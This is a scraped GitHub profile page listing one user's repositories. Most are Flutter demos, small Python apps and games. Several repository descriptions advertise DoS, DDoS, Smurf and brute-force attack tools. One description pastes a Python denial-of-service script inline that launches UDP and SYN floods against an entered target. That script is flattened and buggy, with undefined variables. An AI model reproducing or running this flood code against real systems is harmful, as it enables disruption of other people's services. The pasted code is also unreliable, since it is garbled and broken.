Pinned Repositories
angular-app-dbz
Angular-CountryApp
Astro-01-fundation
calculator-tkinter
A simple calculator with python3 and tkinter
cv-static-aws
iNetStorm-Unified-Python-Network-Testing-Tool
A Python tool to perform DoS, brute force and fake data fill attacks *For educational purposes only*
Snake-Game-in-Python
Classic snake game in python3 🐍
Stock-Trading-News-Alert
This project fetches the latest stock price for a specified company and sends an SMS alert via Twilio if there is a significant change. The SMS contains a brief on the latest news related to the company.
test-of-all-the-states-of-mexico
In this small game you can test your skills in geography, you have to write the name of the 32 states of México.
VeggieBuddie
GerardoBZentenoM's Repositories
GerardoBZentenoM/cv-static-aws
GerardoBZentenoM/VeggieBuddie
GerardoBZentenoM/Awesome-Python-Scripts
A Curated list of Awesome Python Scripts that Automate Stuffs.
GerardoBZentenoM/calculator-tkinter
A simple calculator with python3 and tkinter
GerardoBZentenoM/card_ui_kit
A collection of cards that you can use easily and ready to be used in your Flutter applications.
GerardoBZentenoM/CarouselOverlappingCards-Flutter
Overlapping cards vertical scrolling with carousel effect
GerardoBZentenoM/Snake-Game-in-Python
Classic snake game in python3 🐍
GerardoBZentenoM/Challenge-Batatabit
Responsive Design Challenge
GerardoBZentenoM/Curso-de-Flutter-Avanzado-en-Platzi
GerardoBZentenoM/DDOS-TOLL
A tool that performs HULK HTTP flood, Ping of Death, UDP flood, SNMP, Smurf ICMP, and Slowloris attacs
GerardoBZentenoM/flutter-day-1
Flutter challenges - Day 1 - UI for a Wallets
GerardoBZentenoM/Flutter-InfiniteCards
An infinite card switching UI for Flutter, support custom animation 自定义实现神奇动效的卡片切换视图
GerardoBZentenoM/ICMP_Smurf_Attack
ICMP Smurf Attack in python
GerardoBZentenoM/lenguajesdeinternet
hello_world_in_Flutter
GerardoBZentenoM/MeshCommander
MeshCommander is a Intel(R) Active Management Technology (Intel(R) AMT) remote management tool. It's feature rich and includes a built-in remote desktop viewer for Hardware-KVM, a Serial-over-LAN terminal, IDER-Redirection support and much more. MeshCommander is built on web technologies and runs on many plaforms. In addition to being available as a stand-alone tool, MeshCommander was built to be very space efficient to that it can be uploaded into Intel AMT flash space to have it served diretly from the Intel AMT web serve.
GerardoBZentenoM/mr_tabs
Flutter Android Swipe Tabs with Cards example tutorial. Find complete tutorial here http://camposha.info/flutter/swipe-tabs-cards
GerardoBZentenoM/p3nnnny-wise.py
Penny-Wise is a stress testinh hard hiting Denial Of service Script Made in Python here is the script ___ ___ ___ ___ ___ ___ | )|___)| )| )\ ) | )| |___ |___) |__/ |__ | / | / \_/ |/\/ | __/ |__ | / """ ) print ("*" * 60) print (" ̫̣̘̲͓" ) print ("*" * 60, "red") print (""" choose request 1. udp flood (for ppl) 2. synflood (for web sites **2 ONLY WORKS ON KALI LINUX**)""") type = raw_input("penny Wise> ") if type == "1": import socket import os import time import random import sys client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) bytes = random._urandom(1024) victim = raw_input("enter ip or website: ") vport = input(" port: ") duration = input("time(in secs): ") timeout = time.time() + duration sent = 0 print (""" **************************************************** Dos attack starting. Sit back and ejoy the show ****************************************************""") while 1: if time.time() > timeout: break else: pass client.sendto(bytes, (victim, vport)) sent = sent + 1 sys.stdout.write("\r% d packets sent " % sent) sys.stdout.flush() if type == "2": import socket, random, sys, threading from scapy.all import * total = 0 target1 = raw_input("targets site: ") port = input("port: ") class SendHTTP(threading.Thread): global target, port def __init__(self): threading.Thread.__init__(self) def run(self): i = IP() i.dst = target1 t = TCP() t.sport = random.randint(1,65535) t.dport = port f.flags = 's' send(i/t, verbose=0) print (""" ******************************************************** Dos attack starting. Sit back and ejoy the show ******************************************************""") while 1: SendHTTP(POST).start() total = total + 1 sys.stdout.write("\r packets sent %i" % total)
GerardoBZentenoM/pic-iot-aws-sensor-node
GerardoBZentenoM/platzi-scripts
Collection of platzi scripts for classes
GerardoBZentenoM/Pomodoro-app-python
Pomodoro App with GUI
GerardoBZentenoM/scammingthescammers
short script for scamming the scammers with phishing links, by brute forcing random data that makes sense
GerardoBZentenoM/SecLists
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
GerardoBZentenoM/Taskist
Flutter ToDo App with Firebase
GerardoBZentenoM/tkinter-Mile-to-KM
GUI to convert miles to km